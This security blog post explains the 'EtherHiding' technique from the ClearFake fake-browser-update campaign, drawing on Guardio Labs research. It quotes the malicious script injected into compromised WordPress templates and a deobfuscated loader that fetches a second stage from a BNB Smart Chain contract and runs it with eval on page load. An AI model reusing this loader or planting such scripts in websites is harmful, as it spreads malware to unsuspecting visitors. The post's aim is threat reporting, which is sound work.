Etherhiding, or How to Host Malicious Code Forever After

Nefture Security | Blockchain Security
Published in Dissecting Web3
Nov 16, 2023

“EtherHiding” presents a novel twist on serving malicious code by utilizing Binance’s Smart Chain contracts to host parts of a malicious code chain in what is the next level of Bullet-Proof Hosting,” reported Nati Tal, Head of Guardio Labs, and Oleg Zaytsev, Security Researcher at Guardio.

In their latest report, they unveiled a worrying new trend adopted by some phishing scammers that could make them stronger, more resilient and, in practice, very hard to stop.

A true cybersecurity horror story.

In Web3, “Code is Law.”

And scammers are using the blockchain's immutability to become impervious to any attempt at taking down the malicious code they rely on during their criminal process.

Guardio Labs has dubbed this technique Etherhiding, and summarized it in one horror-inducing sentence: “Hiding Web2 Malicious Code in Web3 Smart Contracts.”

Here’s a comprehensive breakdown of a development that promises to bring pandemonium to the lives of both Web2 and Web3 users.

This story begins in classic scamming fashion. Scammers compromise legitimate websites so that, as soon as a visitor lands on one, an overlay tells them they must update their browser before they can access the content.

Source: Internet Storm Center

Victims who follow the prompt end up downloading malware, such as spyware that collects their activity data without their knowledge.

Guardio underlines that this “fake-update” malware propagation campaign has been running for months as part of a widespread campaign named “ClearFake”, originally identified by security researcher Randy McEoin.

WordPress, The Unwilling Trojan Horse

One of the main protagonists in this whole affair is WordPress.

WordPress is a popular content management system (CMS) used by millions of websites around the world. It is not inherently more vulnerable than other CMS platforms, but WordPress sites are frequently compromised for a handful of recurring reasons:

  • outdated software (many sites run old versions of the CMS core, themes and plugins with known vulnerabilities)
  • poorly secured third-party plugins and themes
  • weak administrator passwords, which leave the login page open to brute-force attacks
  • poorly configured file and directory permissions
  • SQL injection and cross-site scripting (XSS), common web application vulnerabilities that also affect WordPress sites and their plugins
  • site owners who skip basic protections such as a web application firewall, security plugins, or TLS certificates, leaving their sites more exposed

Profiting from this slew of weaknesses, the fraudsters compromised WordPress sites en masse.

They inserted the following code into the primary template of a WordPress site.

SOURCE - Guardio Labs: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16

<script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>
<script src="data:text/javascript;base64,YXN5bmMgZnVuY3Rpb24gbG9hZCgpe2xldCBwcm92aWRlcj1uZXcgZXRoZXJz
LnByb3ZpZGVycy5Kc29uUnBjUHJvdmlkZXIoImh0dHBzOi8vYnNjLWRhdGFzZWVkMS5iaW5hbmNlLm9yZy8iKSxzaWduZXI9cHJvd
[......]b2FkOw=="></script>

This is the first stage of the two-stage ‘ClearFake’ infection chain.

‘This initial “bridgehead” code is injected into article pages and retrieves a second-stage payload from a server controlled by the attackers, which then carries out the rest of the site defacement,’ explains Guardio Labs.

This is when the second protagonist of the story enters the scene.

Cloudflare, the Unwilling Trigger

As Guardio breaks it down, the second stage begins with the initial code “retrieving a second-stage payload from a server.”

A (very!) simplified schematic of that sentence would be: Code #1 on WordPress communicates with Code #2 on a server.

Code #2, or second-stage code, allows the attackers, without even having to re-access the hacked WordPress sites, to “remotely and instantly modify the infection process and display any message they want. […] change tactics, update blocked domains, and switch out detected payloads […].”, per Guardio.

The server on which Code #2 was hosted was Cloudflare Workers.

Probably after receiving many abuse reports, Cloudflare blocked the accounts hosting the malicious code, tolling the bell for many of the nefarious actors behind the ‘ClearFake’ campaign.

The story could have stopped here.

But it was fated not to be so.

If there is one thing one should never underestimate, it is the astuteness of scammers.

The scamming show must go on, so a way to keep it going was found.

And so the story goes on.

BNB Chain, the Unwilling Accomplice

Since hosting code on abused Cloudflare Workers accounts would no longer do, they set their sights on a new possibility: the blockchain.

Storing the code in a smart contract lets the attackers host it without tying it to an account that can be suspended and, on paper, makes it impossible for anyone to ever take it down.

This method of hosting malicious code is pure evil genius.

Where a hosting provider could once be pressured into pulling the payload, no single party can now do so.

Guardio's detailed dissection of EtherHiding shows how the same first-stage code on WordPress that once fetched Code #2 from Cloudflare now queries the BNB Smart Chain (BSC) instead:

SOURCE - Guardio Labs: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16

// include <https://cdn.ethers.io/lib/ethers-5.2.umd.min.js>
async function load() {
  // Read-only provider pointing at a public BSC RPC node: no wallet, no key, no account
  let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
    signer = provider.getSigner(), // obtained but never used
    address = "0x7f36D9292e7c70A204faCC2d255475A861487c60", // attacker-controlled contract
    ABI = [
      { inputs: [{ internalType: "string", .......}, // string-input function (name elided): a write like this updates the stored payload
      { inputs: [], name: "get", ......},            // getter: returns the base64-encoded second stage
      { inputs: [], name: "link", ....... },
    ],
    contract = new ethers.Contract(address, ABI, provider),
    link = await contract.get(); // a single eth_call; nothing is written on chain
  eval(atob(link)); // decode and execute the fetched second stage
}
window.onload = load;

Guardio reveals:

“Once the first stage code on the compromised WordPress site loads, it calls the Binance’s SDK eth_call method on the BlockChain and fetches the malicious JavaScript code above.

eth_call is a read-only and cost-free operation, originally designed to simulate contract execution for reading data or testing without any real-world impact.

As such, it is not even recorded on the blockchain.

So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces.

More, it was found out that the “second stage domain is being changed on an almost daily basis.”

This shows what on-chain hosting buys the attackers: the whole attack chain can be repointed with a single blockchain transaction that overwrites the string stored in the contract, with no need to touch the compromised WordPress sites again. That transaction is also the one trace the technique does leave: while the eth_call reads are never recorded, every update is itself a public, permanent transaction, so the contract's history exposes each second-stage payload the attackers ever stored.

On-chain hosting of malicious code, being cheap, anonymous, hard to trace and almost impossible to take down, promises to bring forth a new era.

One where the phishing and malware industry will be able to prosper as never before.

In the face of such a threat, Guardio is asking Binance to step in by disabling:

1. any query to addresses already tagged as “Malicious”

2. the eth_call debug method for unvalidated contracts

Will Binance do so? Will it even be enough?

The coming months and years will tell soon enough whether it was all a blip or one of the biggest challenges posed to the cybersecurity industry.

About us

Nefture is a Web3 real-time security and risk prevention platform that detects on-chain vulnerabilities and protects digital assets, protocols and asset managers from significant losses or threats.

Nefture's core services include Real-Time Transaction Security and a Threat Monitoring Platform that provides accurate exploit detection and fully customized alerts covering hundreds of risk types, with clear expertise in DeFi.

Today, Nefture proudly collaborates with leading projects and asset managers, providing them with unparalleled security solutions.

Secure your crypto journey, book a demo now!
